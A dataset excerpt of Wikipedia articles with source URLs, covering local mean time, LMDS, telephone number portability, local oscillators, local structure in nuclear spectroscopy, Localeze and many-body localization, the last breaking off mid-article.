text stringlengths 11 320k | source stringlengths 26 161 |
|---|---|
Local mean time ( LMT ) is a form of solar time that corrects the variations of local apparent time , forming a uniform time scale at a specific longitude . This measurement of time was used for everyday use during the 19th century before time zones were introduced beginning in the late 19th century; it still has some uses in astronomy and navigation. [ 1 ]
The difference between local mean time and local apparent time is the equation of time .
Local mean time was used from the early 19th century, when local solar time or sundial time was last used until standard time was adopted on various dates in the several countries. Each town or city kept its own meridian , so locations one degree of longitude apart had times four minutes apart. [ 2 ] This became a problem in the mid 19th century when railways needed clocks for railway time that were synchronized between stations, while local people needed to match their clock (or the church clock) to the time tables. Standard time means that the same time is used throughout some regional time zone—usually, it is at an offset from Greenwich Mean Time or the local mean time of the capital of the region. | https://en.wikipedia.org/wiki/Local_mean_time |
Local multipoint distribution service ( LMDS ) is a broadband wireless access technology originally designed for digital television transmission (DTV). It was conceived as a fixed wireless, point-to-multipoint technology for utilization in the last mile . [ 1 ] LMDS commonly operates on microwave frequencies across the 26 GHz and 29 GHz bands. In the United States, frequencies from 31.0 through 31.3 GHz are also considered LMDS frequencies. [ 2 ]
Throughput capacity and reliable distance of the link depends on common radio link constraints and the modulation method used – either phase-shift keying or amplitude modulation . Distance is typically limited to about 1.5 miles (2.4 km) due to rain fade attenuation constraints. Deployment links of up to 5 miles (8.0 km) from the base station are possible in some circumstances such as in point-to-point systems that can reach slightly farther distances due to increased antenna gain .
There was interest in LMDS in the late 1990s and it became known in some circles as "wireless cable" for its potential to compete with cable companies for provision of broadband television to the home. The Federal Communications Commission auctioned spectrum for LMDS in 1998 and 1999. [ 3 ]
Despite its early potential and the hype that surrounded the technology, LMDS was slow to find commercial traction. Many equipment and technology vendors [ who? ] simply abandoned their LMDS product portfolios.
Industry observers [ who? ] believe that the window for LMDS has closed with newer technologies replacing it. Major telecommunications companies have been aggressive about deploying alternative technologies such as IPTV and fiber to the premises , also called "fiber optics". Moreover, LMDS has been surpassed in both technological and commercial potential by the LTE , WiMax and 5G NR standards.
Although some operators use LMDS to provide access services, LMDS is more commonly used for high-capacity backhaul for interconnection of networks such as GSM , UMTS , LTE and Wi-Fi .
Multichannel multipoint distribution service | https://en.wikipedia.org/wiki/Local_multipoint_distribution_service |
Local number portability ( LNP ) for fixed lines , and full mobile number portability ( FMNP ) for mobile phone lines, refers to the ability of a "customer of record" of an existing fixed-line or mobile telephone number assigned by a local exchange carrier (LEC) to reassign the number to another carrier ("service provider portability"), move it to another location ("geographic portability"), or change the type of service ("service portability"). [ 1 ] In most cases, there are limitations to transferability with regards to geography, service area coverage, and technology. Location Portability and Service Portability are not consistently defined or deployed in the telecommunication industry. [ 2 ]
In the United States and Canada, mobile number portability is referred to as WNP or WLNP (Wireless LNP). [ 3 ] In the rest of the world it is referred to as mobile number portability (MNP). [ 4 ] Wireless number portability is available in some parts of Africa, Asia, Australia, Latin America and most European countries including Britain; however, this relates to transferability between mobile phone lines only. Canada, South Africa and the United States are the only countries that offer full number portability transfers between both fixed lines and mobile phone lines, [ 5 ] because mobile and fixed line numbers are mixed in the same area codes , and are billed identically for the calling party, the mobile user usually pays for incoming calls and texts; in other countries all mobile numbers are placed in higher priced mobile-dedicated area codes and the originator of the call to the mobile phone pays for the call . The government of Hong Kong has tentatively approved fixed-mobile number portability; however, as of July 2012, this service is not yet available.
Some cellular telephone companies will charge for this conversion as a regulatory cost recovery fee.
LNP was invented by Edward Sonnenberg while working for Siemens.
Though it was introduced as a tool to promote competition in the heavily monopolized wireline telecommunications industry, [ 6 ] number portability became popular with the advent of mobile telephones , since in most countries different mobile operators are provided with different area codes and, without portability, changing one's operator would require changing one's number. Some operators, especially incumbent operators with large existing subscriber bases, have argued against portability on the grounds that providing this service incurs considerable overhead, while others argue that it prevents vendor lock-in and allows them to compete fairly on price and service. Due to this conflict of interest, number portability is usually mandated for all operators by telecommunications regulatory authorities. In the US, LNP was mandated by the Federal Communications Commission (FCC) in 1996. [ 6 ] The mandate required all carriers in the top 100 metropolitan statistical areas (MSAs) to be "LNP-capable" and port numbers to any carriers sending a BFR (bona fide request). The ability to keep a number while switching providers is thought to be attractive to consumers. [ 7 ] It was also a major point made by CLECs ( competitive local exchange carriers ) preventing customers from leaving ILECs ( incumbent local exchange carriers ), thus hindering competition. Details regarding the reasons for LNP and how it is to be implemented can be found in the First Report and Order referenced above.
In the US, the FCC has mandated this in order to increase competition among providers. As of late November 2003, LNP was required for all landline and wireless common carriers , so long as the number is being ported to the same geographical area or telephone exchange . This latest mandate included carriers outside the top 100 MSAs that previously enjoyed a rural carrier exemption.
There are four main methods to route a number whose operator has changed. [ 8 ] [ 9 ]
The operator that originates the call always checks a centralized database and obtains the route to the call.
The originating operator then routes the call to Serving Network.
The operator that originates the call first checks with the operator to which the number initially belonged, the donor operator. The donor operator verifies the call and informs that it no longer possesses the number. The operator that originates the call then checks the centralized database, as is done with ACQ.
Also known as Return to Pivot (RoP). The operator that originates the call first checks with the donor operator. The donor operator checks its own database and provides a new route. The operator that originates the call then uses this route to forward the call. No central database is consulted.
The operator that originates the call routes the call to the donor operator. The donor operator checks its own database and obtains a new route. The operator to which the number was designated routes the call to the new operator. This model is called indirect routing.
Complexity for number portability can come from many sources. Historically, numbers were assigned to various operators in blocks. The operators, who were often also service providers, then provided these numbers to the subscribers of telephone services. Numbers were also recycled in blocks. With number portability, it is envisioned that the size of these blocks may grow smaller or even to single numbers. Once this occurs the granularity of such operations will represent a greater workload for the telecommunications provider.
With phone numbers assigned to various operators in blocks, the system worked quite well in a fixed line environment since everyone was attached to the same infrastructure. The situation becomes somewhat more complex in a wireless environment such as that created by cellular communications .
In number portability the “donor network” provides the number and the “recipient network” accepts the number. The operation of donating a number requires that a number be “snapped out” from a network and “snapped into” the receiving network. If the subscriber ceases to need the number then it is normal that the original donor receive the number back and “snaps back” the number to its network. The situation is slightly more complex if the user leaves the first operator for a second and then subsequently elects to use a third operator. In this case the second operator will return the number to the first and then it is assigned to the third.
In cellular communications the concept of a location registry exists to tie a “mobile station” (such as a cellular phone) to the number. If a number is dialed it is necessary to be able to determine where in the network the mobile station exists. Some mechanism for such forwarding must exist. (For an example of such a system, see the article on the GSM network.)
In the US, there are standards for portability defined by the FCC, the LNPA, NANPA and the ATIS which are agreed upon by all member providers to help make LNP as cost-efficient and expedient as possible while still retaining a healthy level security for all providers and in respect of the highest level of customer service. These rules, first defined in the 1st, 2nd and 3rd Reports and Orders by the FCC (publicly available at fcc.gov), are further detailed by the LNPA in order to ensure any provider can successfully port numbers to any other provider. iconectiv provides a national database called the NPAC (National Portability Administration Center) which contains the correct routing information for all ported and pooled numbers in the US and Canada. [ 10 ] The NPAC maintains detailed documentation of the procedure common among US carriers to port numbers as described here.
Providers use SS7 to route calls throughout the US/Canada network. SS7 accesses databases for various services such as CNAM, LIDB , VSC and LNP. Calls to ported numbers are completed when a customer who calls a ported number sends the dialed number to a provider's SSP (Service Switch Point), where it is identified either as a local call or not. If the call is local, the switch has the NPA-NXX in its routing table as portable, so it sends a routing request to the Signal Transfer Point (STP) which accesses a local database that is updated by an LSMS (Local Service Management System) which holds all routing for all ported numbers to which the carrier is responsible for completing calls. If routing information is found, a response is sent to the "query" containing the information necessary to properly route the call. If it is not a local number, the call is passed on to the STP and routed until it gets to a local carrier who will perform the "query" mentioned earlier and route the call accordingly.
The routing information necessary to complete these calls is known as a Location Routing Number (LRN). The LRN is no more than a simple 10-digit telephone number that resides in the switch of the service provider currently providing service for the ported telephone number.
When a provider receives a request to port a telephone number from a new customer, that provider sends an industry-standard Local Service Request (LSR) to the existing (or "old") provider. When the Old Provider receives this request, it sends back Firm Order Confirmation (FOC) and the process of porting the number(s) begins. Either provider can initiate the port using a Service Order Activator (SOA or LSOA) which directly edits the NPAC database mentioned before. Providers can also make these requests within the NPAC database directly. If the new provider initiates the port, it is called a "pull," and if the old provider initiates, it is a "push." Once the number is pulled or pushed, the providers must concur the request and the new provider must "activate" the number using the LRN of the switch serving the customer on the agreed due date. At the point this is completed, the number is ported.
Much of this process is duplicated in intermodal portability (porting between wireline and wireless providers). There are a few technical differences, however, in WLNP—Especially with concern to the time intervals allowed.
Some service providers, especially related to fax services, do not qualify as a "local exchange carrier" or other form of telecommunications carrier. [ 11 ] Such service providers may be the "customer of record" from the LEC's perspective. As a result, the applicable law may not require that such service provider port out the number to another provider. Users and providers often negotiate portability and port out fees. [ 12 ] eFax is one vendor that claims it is not a telecommunications company and does not allow porting out of numbers originally assigned by them to their customers; however, numbers ported by customers into eFax may be ported out. [ 13 ]
A fax machine connected to its own physical telephone line at the subscriber's premises is portable in the same manner as any other standard wireline service. Distinctive ring sometimes poses problems, as one landline may have two or three numbers with a fax or dial-up modem programmed to answer just one of the secondary numbers on the line. Porting out the main number will usually unsubscribe the entire line, disconnecting the secondary numbers without moving them to the new provider.
In Canada, pocket pager answering services are exempted from all local number portability requirements. The same is not true of mobile telephones , which are fully portable to another carrier or another service type (such as landline or voice over IP ) within the same local interconnection region . [ 14 ]
In Kenya , announced in 2004 that mobile number portability would be available as of July 1, 2005 and fixed-line number portability as of July 1, 2006. [ 15 ] Mobile Number Portability was officially launched on April 1, 2011. [ 16 ]
In South Africa , announced Number Portability Company (Pty) Ltd (Reg. No. 2005/040348/07) was established in 2005 and Mobile Number Portability was introduced on 10 November 2006. Geographic Number Portability (between fixed operators) was introduced on 26 April 2010. The Mobile Number Portability Company is jointly owned by the mobile and fixed operators including Vodacom, MTN, Cell C, Telkom and Neotel. [ 17 ]
In Argentina , full mobile number portability is available since March 2012, being a law approved in 2000. It originally took up to ten working days to be effective. [ 18 ] Since July 2017, however, takes up to a 24-hour period to be effective. [ 19 ]
In Brazil , number portability (both fixed and mobile) is available nationwide since March, 2009. However, it's not possible to port a fixed line number to a mobile line number and vice versa [ 20 ] . [ 21 ] It's possible to carry the fixed line number within the same municipality and for mobile line number within the same area code (comprising from parts of a state to an entire state).
In Canada , wireline/competitive local exchange carriers must provide portability. As of March 14, 2007, wireless carriers must provide portability in most of Canada. [ 22 ]
Numbers are only portable within a LIR ( local interconnection region ), regions defined by the ILEC and approved by the Canadian Radio-television and Telecommunications Commission (CRTC), each of which cover a number of exchanges. Each LIR has a Point of Interconnection (POI) exchange through which calls are routed, and if a number is ported out to a different LIR then calls to that destination will be rejected by the POI switch.
Not all exchanges support LNP, typically there needs to exist competition within an exchange before an ILEC will enable portability, and then only by request. Most small local independent telephone company exchanges are exempted from competition and local number portability requirements. Numbers in the rarely used non-geographic area code 600 are not portable.
In the Dominican Republic , number portability in both mobile and local telephony was launched September 30, 2009. In March, 2009, the Dominican Telecommunications Institute (INDOTEL) selected Informática El Corte Inglés to administer the number portability. [ 23 ]
In Ecuador , Mobile Number Portability has been available since 12 October 2009.
In the Mexico is first Latin American country to have number portability in both mobile and local telephony. [ 24 ] The Federal Commission of Telecommunications ( COFETEL ) applied this law, in defense and regulation of the Telmex monopoly. It was also a condition for Telmex for entering the video market triple play [ citation needed ] . Number portability has been available since July 5, 2008. [ 24 ] The service used to be administered by Telcordia Technologies . [ 24 ]
On August 29, 2019, the Federal Telecommunications Institute (IFT) announced that at the request of the telecommunications service providers, it would migrate its portability database administration to Mediafon Datapro. As a result, portability was temporarily suspended from August 30 to September 1. [ 25 ] On September 2, portability was resumed with the service now being handled by Mediafon Datapro. [ 26 ]
In the United States , 47 U.S.C. § 251 (b)(2), added by the Telecommunications Act of 1996 , requires all local exchange carriers (LECs) to offer number portability in accordance with the regulations of the Federal Communications Commission (FCC). [ 27 ] The FCC implemented regulations on 27 June 1996, with LECs required to implement them in the 100 largest Metropolitan Statistical Areas by 1 October 1997 and elsewhere by 31 December 1998. [ 28 ] (The regulations are currently located at 47 CFR 52 , 47 CFR 52.20 et seq. ) The North American Numbering Council (NANC) was directed to select the Local Number Portability Administrators (LNPAs), akin to the North American Numbering Plan (NANP) which administers the North American Numbering Plan . [ 29 ]
LNP was first implemented in the US upon the establishment of the original Number Portability Administration Center (NPAC) in Chicago , Illinois , in 1998. This service covered select rate centers in the Ameritech region. Thereafter, as switches and telephone networks were upgraded with location routing number (LRN) capability, LNP was deployed sequentially to the remaining Regional Bell Operating Company (RBOC) areas. The FCC since has mandated Wireless Local Number Portability starting November 24, 2003 (in metropolitan areas) and allowed operators to charge an additional monthly Long-Term Telephone Number Portability End-Use Charge as compensation. On November 10, 2003, the FCC additionally ruled that number portability applies to landline numbers moving to mobile telephones and, on October 31, 2007, the FCC made clear that the obligation to provide LNP extends to VoIP providers. [ 30 ]
Toll-free telephone numbers (area code +1-800) have been portable through the RespOrg system since 1993 in the US [ 31 ] and 1994 in Canada.
In Hong Kong , fixed line number portability is available since July 1, 1995, the same day of fixed line telephone market liberalization (i.e., reversal of franchised monopoly), which was a requirement from the government. [ 32 ] Mobile number portability is available since March 1, 1999. [ 33 ] Although the government allowed porting a fixed line number to a mobile carrier or vice versa, the introduction of this service shall be decided by the fixed/mobile carriers in a voluntary basis. As of October 2009, fixed-mobile number portability is not available. [ 34 ]
In India , mobile number portability launched in the state of Haryana on November 25, 2010. It was finally launched all over India on January 20, 2011.
In Japan , fixed line portability began in March, 2001. 番号ポータビリティー制度 (bangō portability seido – commonly referred to as portability or MNP) began on October 24, 2006. [ 35 ] [ 36 ] Users are able to change cellular phone carriers without changing their number for a fee of 5000 yen. However, e-mail addresses are subject to change, and music/data downloaded may become unusable.
The Japanese Ministry of Internal Affairs and Communications (MIC) spent three years to put mobile number portability into practice, since its initial workgroup started in November, 2003. As a result, NTT DoCoMo, KDDI and Softbank accelerated the price battle, but it was of little effect due to already competitive price plans and customer loyalty. Overall, mobile number portability in Japan was not very successful, because of high transition costs for the customer due to SIM lock , the long time it took to establish mobile number portability, allowing operators to fence in subscribers with price plans, and the significance of mobile Internet mail.
In Malaysia , mobile number portability plan to start by mid-2008, according to an article on the National News Agency Bernama
In Pakistan , ( پاکستان ) the PTA mandated mobile number portability on March 23, 2007. Users are able to change their cellular phone service for free. They just have to pay for new sim cards depending upon the provider they are migrating. Some companies even do not charge anything. [ 37 ]
Singapore was one of the first countries to introduce number portability for mobile telephones in 1997. This is currently implemented through voice call & SMS forwarding. True number portability was realized from June 13, 2008, with the implementation of a Centralised Number Portability Database Solution, as proposed by the Infocomm Development Authority (IDA) of Singapore. [1]
In South Korea , mobile number portability service started from January 1, 2004. One thing different from
other countries is that it started from SK Telecom, the dominant operator which has over 50% of market share. To prevent users' churning to the dominant operator, the government gave six months' and one year's delay to the second and the third operator, respectively. As a result, only SK Telecom's subscribers could move to other operators during the first six months. [ 38 ]
In Sri Lanka , mobile number portability service started in August 2007. This is supported by Sri Lanka Telecom owned Mobitel Lanka and other cellular operators.
In the European Union , all telephone providers are required to provide number portability under the Universal Services Directive (2002/22/EU) .
In Albania , mobile number portability was implemented in 04.05.2011 (AKEP) Archived July 3, 2018, at the Wayback Machine . For fixed-line numbers, it started on some geographical areas in September 2012 and was available in all country by 01.04.2013 (AKEP) Archived July 3, 2018, at the Wayback Machine .
In Austria , number portability was implemented in October 2004.
In Belgium , number portability was implemented in October 2002.
In Cyprus , geographic, non-geographic and mobile number portability is required as of July 12, 2004. [ 39 ]
In Denmark , portability of fixed line numbers and ISDN was implemented on January 1, 2001. Mobile number portability was implemented on July 1, 2001. [ 40 ] In 2006, 238,293 fixed lines were ported, along with 456,159 mobile lines. Considering that the number of fixed lines by the end of 2006 was 2,974,000 and the number of mobile lines was 5.828.000, [ 41 ] roughly 7.9% of lines were ported in 2006.
In Estonia , number portability is required from fixed operators since January 1, 2004 and should be required from mobile operators as from January 1, 2005. [ 39 ]
In Finland , mobile number portability was implemented on July 25, 2003. [ 42 ] The impact of mobile number portability in Finland exceeds that of other countries. In one year (June 2003 – June 2004), the combined market share of TeliaSonera, Elisa and DNA fell from 98.7% to 87.9%. [ 43 ]
In France , geographic number portability has been available since January 1, 1998. As of January 1, 2001, it became possible to change geographic location or operator while keeping the same number. [ 44 ] Mobile number portability was introduced on June 30, 2003. [ 45 ] However, due to its lack of effectiveness, a new system was launched on May 21, 2007 with two objectives: having a single contact for the customer (the new operator should take all the steps towards mobile number portability) and a maximum period of ten days for mobile number portability to have effect. [ 46 ]
In Germany , fixed number portability was introduced on January 1, 1998, for geographic numbers and numbers for non-geographic services. Mobile number portability was implemented on November 1, 2002. [ 39 ]
In Greece , fixed number portability is available since January 1, 2003. Mobile number portability was implemented on March 1, 2004. [ 39 ]
In Hungary , portability exists for geographic numbers since January 1, 2004. Portability for non-geographic numbers (including mobile numbers) is available since May 1, 2004. [ 39 ] There has been added a special area code +36 21 , which legally allows the phone number to be anywhere in the world, beside having the +36 country code prefix.
In Ireland , local number portability was implemented in 2000, using an IN solution with a shared routing database. Partial mobile number portability was introduced in 1997 with full portability becoming available in 2003.
In Italy , mobile number portability is available since April 30, 2002. [ 47 ]
In Luxembourg , mobile number portability introduced in June 2004. The Mobile Number Portability Central (MNPC) managed by the G.I.E Telcom E.I.G. operator group and developed, installed and operated by Systor Trondheim AS of Norway, was put into commercial operations from February 2005.
In Norway , Fixed number portability was introduced in 2000, one year before the introduction of mobile number portability. The administrative solution for fixed and mobile number portability in Norway, the National Reference Database (NRDB), was put into service in 2000. The NRDB is owned and managed by the 8 largest network operators in Norway through the company NRDB AS. The reference database was developed, installed and is presently operated by Systor Trondheim AS.
In Portugal , fixed number portability was implemented on June 30, 2001. Mobile number portability has been available since January 1, 2002. [ 48 ] The administrative Reference Entity (Entidade de Referencia (ER)) interconnecting all network operators and service providers is operated by a local third party, Portabil S.A. Archived March 21, 2009, at the Wayback Machine , a joint venture between the internationally well known companies Logica and Systor Trondheim AS .
In Slovakia , number portability was implemented in May 2004.
In Spain , number portability among cell phone carriers is available since October 1, 2000, without any cost to the end user. The technical details for the process are regulated by the CMT (Comisión del Mercado de las Telecomunicaciones or Telecoms Market Commission) and all carriers are obliged to comply with their requirements. As of August 2007, cell number portability must complete in 5 business days (i.e. excluding weekends) from the moment the request is confirmed by the customer, with the actual switch occurring late at night to avoid missing any calls. The user wakes up using a new SIM-card from the new cell provider while keeping the number.
In the mature Spanish cell phone market (as of June 2007, with 107 lines per 100 inhabitants [ 49 ] ), portability has been widely used by the competing carriers as a way to steal each other's customers, usually offering them free handsets or extra credit. From June 2006 to June 2007 alone, 3,957,556 cell phone lines switched carriers via this proceeding, about 10% of all cellular lines in use. [ 49 ] Spain is the one country in the European Union where more customers have switched cell phone providers, with more than 9 million carrier switches completed as of April 2007. [ 50 ]
As for the fixed line market, number portability is also available since year 2000, but weaker competition meant that actual adoption of the fixed number portability process was quite sluggish. As of August 2004, 1,041,246 fixed line switches were completed. [ 51 ]
Fixed line market is peculiar in Spain, since only two local loop providers can operate at each particular region (or demarcación as regulated by the CMT): a cable carrier (such as Ono, R and many others) and the former State monopoly ( Telefónica ). The sole of them operating statewide—Telefónica—is obliged to provide other firms with access to their exchange facilities or rental/transfer of their copper last-mile loops, at fees regulated by the CMT (practice known as local loop unbundling ). As cable providers do not have a statewide footprint, many users have no actual chance of applying for "true" fixed number portability, that is, giving up Telefónica's service altogether. Some of them can however get their service from a third company who will bill the service and then pay Telefónica for the copper pair rental and maintenance fees, with the customer receiving a single bill. In the end, as Telefónica set up a reselling program for their fixed lines and DSL internet access, the former monopoly is still much in control of the fixed line market, including profitable broadband access. In fact, Telefónica was fined in excess of €152 million by the European Commission on July 4, 2007 on ground of "impeding competition on the Spanish broadband internet access market for more than five years, and so depriving consumers and business of a choice of broadband suppliers". [ 52 ]
Due to the billing scheme used throughout Europe and most of the world, where the calling party assumes the full cost of the call, and calling a cellphone is usually more expensive than calling a fixed line, a distinction must be made between cellphone numbers (beginning with "6" or, from October 2011, "71", "72", "73" or "74", ) and fixed numbers (usually beginning with 9 or 8). Full number portability in which a customer transfers a cell to a fixed number or vice versa is thus not possible. See Telephone numbering in Spain for more information.
In Sweden , fixed line portability was implemented in 1999 and mobile number portability was implemented on September 1, 2001. At the introduction of mobile number portability the Swedish operators joined forces and procured a central solution, SNPAC CRDB, which is a central reference database now containing both the fixed and mobile portings. [ 53 ] [ 54 ]
In Switzerland , mobile number portability is available since March 1, 2000, [ 55 ] and land line number portability since April 2002. [ 56 ]
In Turkey , mobile number portability was implemented in Nov 2008. Fixed number portability was initially planned to take place exactly 6 months following the mobile number portability, on May 9, 2009. However, it was not until September 9, 2009 that the regulator approved the procedure for fixed number portability. Since then, fixed and mobile operators, and the incumbent, are working to get the process going and performing interoperability tests. However, there is still progress to be made and the progress for fixed number portability has not proved to be going ahead as in-time as the mobile number portability. [ 57 ]
In the United Kingdom , Ofcom directs fixed-line telephone network providers , mobile phone providers and broadband service providers to provide number portability under the Porting Authorisation Code rules and Migration Authorisation Code code of practice respectively. As the UK was an EU member country, the Ofcom direction was intended to reflect the requirements of EU Directive 2002/22/EU.
In Serbia , number portability service on public telephone networks at a fixed location is available as of 1 April 2014.
In Israel , number portability is free and takes 15 minutes. All cellular lines can be ported, Landline numbers may be ported, except between regions (area codes). Wireless and VoIP companies each have a single area code for the whole country. Within it, numbers may be ported with no regard to geographic area.
There is no porting between landline and cellular lines.
(date implemented? http://www.moc.gov.il/new/documents/engineering/faq_24.8.05.pdf )
In Oman , Mobile Number Portability was mandated on the Public Mobile Operators, Nawras and Oman Mobile , via the licenses issued to them by the Telecommunications Regulatory Authority (TRA). Mobile number portability was launched on August 26, 2006. Users are able to change cellular phone carriers without changing their number for a nominal fee of 3 OMR. [ 58 ]
In Saudi Arabia mobile number portability was launched on July 8, 2006, to be the first country to launch this service in the ME region. A centralized number portability clearinghouse (NPC) solution was implemented by CITC (the telecom regulation authority) and the two mobile phone operators were obliged to implement the MNP solution in their networks and to interface with the NPC. the service was provided to the mobile subscribers for free.
In Australia , local telephone numbers have been portable since 1999. The porting process is based on a peer-to-peer file exchange between fixed line operators. According to ACMA, local number portability came into full effect at the start of 2000. Mobile number portability has been available as of September 25, 2001. [ 59 ]
For service providers who require knowledge of porting activity to enable them to deliver voice calls directly to the current "network owner", they can either form agreements with all of the fixed-line operators, or use a third-party LNP provider, such as Paradigm.One .
In New Zealand , local and mobile number portability (LMNP) began on April 1, 2007. The rules governing LMNP originate in the Number Portability Determination. Ports are authorised, scheduled, and coordinated via a centralised number portability system called IPMS (Industry Portability Management System). All networks update their own routing and confirm this to IPMS. There are now 26 carriers and service providers that participate in LMNP in New Zealand, over a million numbers have been ported. | https://en.wikipedia.org/wiki/Local_number_portability |
In electronics , the term local oscillator (LO) refers to an electronic oscillator when used in conjunction with a mixer to change the frequency of a signal. This frequency conversion process, also called heterodyning , produces the sum and difference frequencies from the frequency of the local oscillator and frequency of the input signal. Processing a signal at a fixed frequency gives a radio receiver improved performance.
In many receivers, the function of local oscillator and mixer is combined in one stage called a " converter " - this reduces the space, cost, and power consumption by combining both functions into one active device.
The term local refers to the fact that the frequency is generated within the circuit and is not reliant on any external signals, although the frequency of the oscillator may be tuned according to external signals.
Local oscillators are used in the superheterodyne receiver , the most common type of radio receiver circuit. In this application, the frequency of the local oscillator (LO) is chosen to be similar to the radio frequency (RF) received on the antenna, such that the difference between them is much smaller than the RF. Either high-side injection (where the LO frequency is greater than the RF) or low-side injection (where the LO frequency is less than the RF) may be employed. The difference can then be filtered from the sum to extract the intermediate frequency (IF).
So the frequency chosen for the local oscillator should be f L O = f R F ± f I F {\displaystyle f_{\mathrm {LO} }=f_{\mathrm {RF} }\pm f_{\mathrm {IF} }} .
They are also used in many other communications circuits such as modems , cable television set top boxes , frequency division multiplexing systems used in telephone trunklines , microwave relay systems, telemetry systems, atomic clocks , radio telescopes , and military electronic countermeasure (antijamming) systems.
In satellite television reception, the microwave frequencies used from the satellite down to the receiving antenna are converted to lower frequencies by a local oscillator and mixer mounted at the antenna. This allows the received signals to be sent over a length of cable that would otherwise have unacceptable signal loss at the original reception frequency. In this application, the local oscillator is of a fixed frequency and the down-converted signal frequency is variable.
The performance of a signal processing system depends, amongst other factors, on the characteristics of the local oscillator.
A crystal oscillator is one common type of local oscillator that provides good stability and performance at relatively low cost, but its frequency is fixed, so changing frequencies requires changing the crystal. Tuning to different frequencies requires a variable-frequency oscillator which leads to a compromise between stability and tunability. With the advent of high-speed digital microelectronics, modern systems can use frequency synthesizers to obtain a stable tunable local oscillator, but care must still be taken to maintain adequate noise characteristics in the result. Phase-locked loops are an alternative means of generating precise LO frequencies. By synchronizing with another frequency source, this method ensures a high level of accuracy and stability. [ 5 ]
Detection of local oscillator radiation may disclose the presence of the receiver, such as in detection of automotive radar detectors , or detection of unlicensed television broadcast receivers in some countries. During World War II , Allied soldiers were not allowed to have superheterodyne receivers because the Axis soldiers had equipment which could detect the local oscillator emissions. This led to soldiers creating what is now known as a foxhole radio , a simple improvised radio receiver which has no local oscillator.
The better WW II military communication receivers were engineered to suppress local oscillator emissions. For example, the famous RCA AR-88 has excellent shielding. It also uses two tuned pentode RF stages ahead of the superheterodyne mixer. Pentode tubes have virtually zero reverse gain so LO emissions could not back out through the antenna. | https://en.wikipedia.org/wiki/Local_oscillator |
The local structure is a term in nuclear spectroscopy that refers to the structure of the nearest neighbours around an atom in crystals and molecules . E.g. in crystals the atoms order in a regular fashion on wide ranges to form even gigantic highly ordered crystals ( Naica Mine ). However, in reality, crystals are never perfect and have impurities or defects, which means that a foreign atom resides on a lattice site or in between lattice sites (interstitials). These small defects and impurities cannot be seen by methods such as X-ray diffraction or neutron diffraction , because these methods average in their nature of measurement over a large number of atoms and thus are insensitive to effects in local structure. Methods in nuclear spectroscopy use specific nuclei as probe. The nucleus of an atom is about 10,000 to 150,000 times smaller than the atom itself. It experiences the electric fields created by the atom's electrons that surround the nucleus. In addition, the electric fields created by neighbouring atoms also influence the fields that the nucleus experiences. The interactions between the nucleus and these fields are called hyperfine interactions that influence the nucleus' properties. The nucleus therefore becomes very sensitive to small changes in its hyperfine structure, which can be measured by methods of nuclear spectroscopy, such as e.g. nuclear magnetic resonance , Mössbauer spectroscopy , and perturbed angular correlation .
With the same methods, the local magnetic fields in a crystal structure can also be probed and provide a magnetic local structure. This is of great importance for the understanding of defects in magnetic materials, which have wide range of applications such as modern magnetic materials or the giant magnetoresistance effect, that is used in materials in the reader heads of harddrives.
Research of the local structure of materials has become an important tool for the understanding of properties especially in functional materials, such as used in electronics, chips, batteries, semiconductors, or solar cells. Many of those materials are defect materials and their specific properties are controlled by defects.
This quantum chemistry -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Local_structure |
In mathematics , the local trace formula ( Arthur 1991 ) is a local analogue of the Arthur–Selberg trace formula that describes the character of the representation of G ( F ) on the discrete part of L 2 ( G ( F )), for G a reductive algebraic group over a local field F .
This number theory -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Local_trace_formula |
Localeze is a content manager for local search engines. The company, a service of Neustar , provides businesses with tools to verify and manage the identity of their local listings across the Web. The company works with local search platform partners and location-based [ 1 ] service partners, national brands and local business clients. [ 2 ] [ 3 ] [ 4 ]
Localeze was created in 2005 to help businesses ensure that they have accurate name, address and phone number data available on search engines , Internet Yellow Pages and vertical directories.
In 2010, business listings were also included in personal navigation devices , [ 5 ] mobile apps and on social networking services . [ 6 ]
As a local search business listings provider, Localeze collects and distributes business listings that can be verified by businesses themselves. Its business listings are used by search, social and mobile companies [ 7 ] in the domain of Local Search and location-based services . Such partners include Yahoo! , [ 8 ] Bing , Yellow Pages , TomTom , Siri (acquired by Apple ), Twitter , and Facebook . [ 9 ] | https://en.wikipedia.org/wiki/Localeze |
Many-body localization (MBL) is a dynamical phenomenon which leads to the breakdown of equilibrium statistical mechanics in isolated many-body systems. Such systems never reach local thermal equilibrium , and retain local memory of their initial conditions for infinite times. One can still define a notion of phase structure in these out-of-equilibrium systems. Strikingly, MBL can even enable new kinds of exotic orders that are disallowed in thermal equilibrium – a phenomenon that goes by the name of localization-protected quantum order (LPQO) or eigenstate order. [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
The study of phases of matter and the transitions between them has been a central enterprise in physics for well over a century. One of the earliest paradigms for elucidating phase structure, associated most with Landau, classifies phases according to the spontaneous breaking of global symmetries present in a physical system. More recently, we have also made great strides in understanding topological phases of matter which lie outside Landau's framework: the order in topological phases cannot be characterized by local patterns of symmetry breaking, and is instead encoded in global patterns of quantum entanglement .
All of this remarkable progress rests on the foundation of equilibrium statistical mechanics. Phases and phase transitions are only sharply defined for macroscopic systems in the thermodynamic limit, and statistical mechanics allows us to make useful predictions about such macroscopic systems with many (~ 10 23 ) constituent particles. A fundamental assumption of statistical mechanics is that systems generically reach a state of thermal equilibrium (such as the Gibbs state) which can be characterized by only a few parameters such as temperature or a chemical potential. Traditionally, phase structure is studied by examining the behavior of ``order parameters" in equilibrium states. At zero temperature, these are evaluated in the ground state of the system, and different phases correspond to different quantum orders (topological or otherwise). Thermal equilibrium strongly constrains the allowed orders at finite temperatures. In general, thermal fluctuations at finite temperatures reduce the long-ranged quantum correlations present in ordered phases and, in lower dimensions, can destroy order altogether. As an example, the Peierls-Mermin-Wagner theorems prove that a one dimensional system cannot spontaneously break a continuous symmetry at any non-zero temperature.
